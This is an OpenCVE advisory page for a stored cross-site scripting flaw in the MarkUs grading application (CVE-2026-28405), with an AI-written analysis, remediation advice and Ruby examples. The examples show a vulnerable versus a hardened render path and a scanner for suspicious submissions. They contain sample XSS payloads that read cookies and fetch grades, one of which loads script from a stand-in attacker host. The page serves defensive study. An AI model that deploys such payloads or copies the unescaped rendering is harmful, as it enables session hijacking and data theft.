Description
MarkUs is a web application for the submission and grading of student assignments. Prior to version 2.9.1, the courses/<:course_id>/assignments/<:assignment_id>/submissions/html_content route reads the contents of a student-submitted file and renders them without sanitization. This issue has been patched in version 2.9.1.
Published: 2026-03-05
Score: 8.0 High
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross‑Site Scripting in instructor context
Action: Patch Immediately
AI Analysis

Impact

The vulnerability resides in the /courses/<course_id>/assignments/<assignment_id>/submissions/html_content route, which reads a student-submitted file and renders its contents without sanitization. A student can therefore embed script in a submitted file, and that script executes in the browser of any instructor who opens the submission through this route. Because the script runs in the application's own origin with the instructor's session, it can issue requests as the instructor (the actions the CVE title refers to), hijack the session, or exfiltrate data visible to that account. This is a classic stored cross-site scripting flaw (CWE-79).
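The pattern behind this class of bug, as an added example rather than MarkUs's own code: a hypothetical reconstruction of an unsanitized "return the file bytes as HTML" path next to a hardened version that escapes the content and adds defence-in-depth headers. The route, the function names, the response struct and the sample submission are all assumptions made for the illustration; how MarkUs 2.9.1 actually fixed the route is not stated in the advisory.

```ruby
require "erb"

# Constructed sample of a student "submission" carrying script. This is
# example data for the demonstration, not a captured exploit against MarkUs.
MALICIOUS_SUBMISSION = <<~HTML
  <h1>Assignment 1</h1>
  <script>fetch("/api/grades", {credentials: "include"})</script>
  <img src="x" onerror="alert(document.cookie)">
HTML

# Minimal stand-in for a framework response: status, headers, body.
Response = Struct.new(:status, :headers, :body)

# Vulnerable pattern (hypothetical, modelled on the advisory's description of
# the pre-2.9.1 behaviour): the file's bytes go straight back as text/html, so
# whatever markup the student wrote runs in the viewer's browser.
def render_html_content_vulnerable(file_bytes)
  Response.new(200, { "Content-Type" => "text/html; charset=utf-8" }, file_bytes)
end

# Hardened pattern: escape the content so it is displayed as source text inside
# <pre>, and add headers that limit the blast radius if escaping were ever
# bypassed. CSP "sandbox" without allow-scripts blocks script execution in the
# document, and nosniff stops the browser from reinterpreting the body.
def render_html_content_hardened(file_bytes)
  escaped = ERB::Util.html_escape(file_bytes)
  body = "<!doctype html><meta charset=\"utf-8\"><pre>#{escaped}</pre>"
  headers = {
    "Content-Type" => "text/html; charset=utf-8",
    "Content-Security-Policy" => "sandbox; default-src 'none'",
    "X-Content-Type-Options" => "nosniff",
  }
  Response.new(200, headers, body)
end

# Check used by the demo: does the response body still contain a real tag that
# would execute (a <script> element or an element with an on* handler)?
# Escaped text such as "&lt;img ... onerror=" does not match because it has no
# literal "<".
def executable_markup?(body)
  body.match?(/<(script\b|\w+[^>]*\son\w+\s*=)/i)
end

if __FILE__ == $PROGRAM_NAME
  vuln = render_html_content_vulnerable(MALICIOUS_SUBMISSION)
  safe = render_html_content_hardened(MALICIOUS_SUBMISSION)
  puts "vulnerable response carries executable markup? #{executable_markup?(vuln.body)}"
  puts "hardened response carries executable markup?   #{executable_markup?(safe.body)}"
end
```

If a preview genuinely has to render the student's HTML rather than show it as text, escaping is the wrong tool; the content should go through an allowlist sanitizer (in a Rails application, rails-html-sanitizer or Loofah) and be displayed in a sandboxed iframe served from a separate origin, so that even sanitizer bypasses do not run with the instructor's session.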

Affected Systems

MarkUsProject’s Markus application, versions prior to 2.9.1. The vulnerability is fixed in v2.9.1. No other versions are confirmed affected.

Risk and Exploitability

The CVSS 3.1 base score of 8.0 (AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H) classifies this as a high-severity flaw. The EPSS score of less than 1% indicates a low current probability of exploitation in the wild, it has not been listed in CISA's KEV catalog, and the SSVC assessment records no known exploitation. The vector's PR:L and UI:R reflect the attack path: the attacker needs a low-privileged student account able to submit files, and an instructor must then open the crafted submission through the html_content route. No further privileges are required, and the attacker does not need to trick the instructor into anything unusual, since reviewing submissions is the instructor's normal workflow.
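Because the payload is stored on the server as an ordinary submission, an operator of an unpatched or recently patched instance can look back through existing submissions for attempts. The following triage scanner is an added example, not MarkUs code or an official OpenCVE tool: it applies a small set of regular-expression indicators to submitted files and flags those containing script tags, inline event handlers, javascript: URIs, or embedding elements. The indicator list, function names, and the sample submissions are assumptions; the heuristics are intentionally simple and will miss obfuscated payloads, so a hit is a lead for review, not proof of exploitation.

```ruby
# Heuristic indicators of active content in an HTML-like submission. Each is
# a literal tag check, so escaped text ("&lt;script&gt;") or the word
# "onerror=" in a prose file does not fire.
XSS_INDICATORS = {
  script_tag:     /<script\b/i,
  event_handler:  /<\w+[^>]*\son\w+\s*=/i,
  javascript_uri: /\b(?:href|src|action|formaction)\s*=\s*["']?\s*javascript:/i,
  embedding:      /<(?:iframe|object|embed|svg)\b/i,
  meta_refresh:   /<meta[^>]+http-equiv\s*=\s*["']?refresh/i,
}.freeze

# Scan one submission (name plus raw bytes) and report which indicators hit.
def scan_submission(name, content)
  text = content.dup.force_encoding("UTF-8").scrub
  hits = XSS_INDICATORS.select { |_, re| text.match?(re) }.keys
  { name: name, hits: hits, suspicious: !hits.empty? }
end

# Scan a hash of name => bytes and return only the suspicious entries, most
# indicators first so the noisiest files surface at the top.
def scan_submissions(files)
  files.map { |name, bytes| scan_submission(name, bytes) }
       .select { |r| r[:suspicious] }
       .sort_by { |r| -r[:hits].size }
end

# Walk a directory of stored submissions (path and extension filter are
# assumptions; adapt them to where the deployment keeps submitted files).
def scan_directory(root, extensions: %w[.html .htm .xhtml .svg])
  files = Dir.glob(File.join(root, "**", "*")).each_with_object({}) do |path, acc|
    next unless File.file?(path) && extensions.include?(File.extname(path).downcase)
    acc[path] = File.binread(path)
  end
  scan_submissions(files)
end

# Constructed sample submissions for the demonstration.
SAMPLE_SUBMISSIONS = {
  "a1/student1/report.html" => "<h1>Report</h1><p>See <a href=\"#sec2\">section 2</a>.</p>",
  "a1/student2/index.html"  => "<img src=x onerror=\"fetch('/grades?all=1')\"><script src=//evil.example/x.js></script>",
  "a1/student3/notes.txt"   => "In JavaScript, onerror= handlers run when loading fails.",
  "a1/student4/diagram.svg" => "<svg xmlns=\"http://www.w3.org/2000/svg\"><a href=\"javascript:alert(1)\"><text>hi</text></a></svg>",
}.freeze

if __FILE__ == $PROGRAM_NAME
  scan_submissions(SAMPLE_SUBMISSIONS).each do |r|
    puts "#{r[:name]}: #{r[:hits].join(', ')}"
  end
end
```

Run it against the directory where the instance stores submissions (for example `scan_directory("/path/to/submissions")`) and review each hit by hand; a legitimate web-development assignment will trip these indicators on purpose, which is exactly why the instructor-side rendering, not the upload filter, is the place to fix the bug.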

Generated by OpenCVE AI on April 16, 2026 at 12:10 UTC.

Remediation

The CVE record carries no vendor fix or workaround reference, but its description states that the issue is patched in MarkUs version 2.9.1.

OpenCVE Recommended Actions

  • Update MarkUs to version 2.9.1 or later, the version the CVE description names as patched.
  • If an update is not immediately possible, restrict access to the html_content route or take it out of service until the upgrade. Validating the MIME type or extension of uploads is not a reliable interim control on its own: the route renders whatever bytes the file contains, so a payload inside a file that passes the upload check is still rendered.
  • After upgrading, confirm that no custom template, fork, or deployment override still renders submitted file content unescaped; review templates and views that reference the html_content route.

Generated by OpenCVE AI on April 16, 2026 at 12:10 UTC.

Advisories

No advisories yet.

History

Tue, 10 Mar 2026 20:00:00 +0000

Type   Values Removed   Values Added
CPEs   (none)           cpe:2.3:a:markusproject:markus:*:*:*:*:*:*:*:*

Fri, 06 Mar 2026 17:15:00 +0000

Type      Values Removed   Values Added
Metrics   (none)           ssvc {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}


Fri, 06 Mar 2026 15:30:00 +0000

Type                 Values Removed   Values Added
First Time appeared  (none)           Markusproject; Markusproject markus
Vendors & Products   (none)           Markusproject; Markusproject markus

Thu, 05 Mar 2026 20:30:00 +0000

Type          Values Removed   Values Added
Description   (none)           MarkUs is a web application for the submission and grading of student assignments. Prior to version 2.9.1, the courses/<:course_id>/assignments/<:assignment_id>/submissions/html_content route reads the contents of a student-submitted file and renders them without sanitization. This issue has been patched in version 2.9.1.
Title         (none)           MarkUs: Stored XSS in Submission HTML Preview Enables Instructor-Context Actions
Weaknesses    (none)           CWE-79
References    (none)           (none recorded)
Metrics       (none)           cvssV3_1 {'score': 8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-03-06T17:04:05.190Z

Reserved: 2026-02-27T15:33:57.289Z

Link: CVE-2026-28405

Vulnrichment

Updated: 2026-03-06T17:04:00.884Z

NVD

Status : Analyzed

Published: 2026-03-05T21:16:21.707

Modified: 2026-03-10T19:53:01.670

Link: CVE-2026-28405

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-16T12:15:35Z

Weaknesses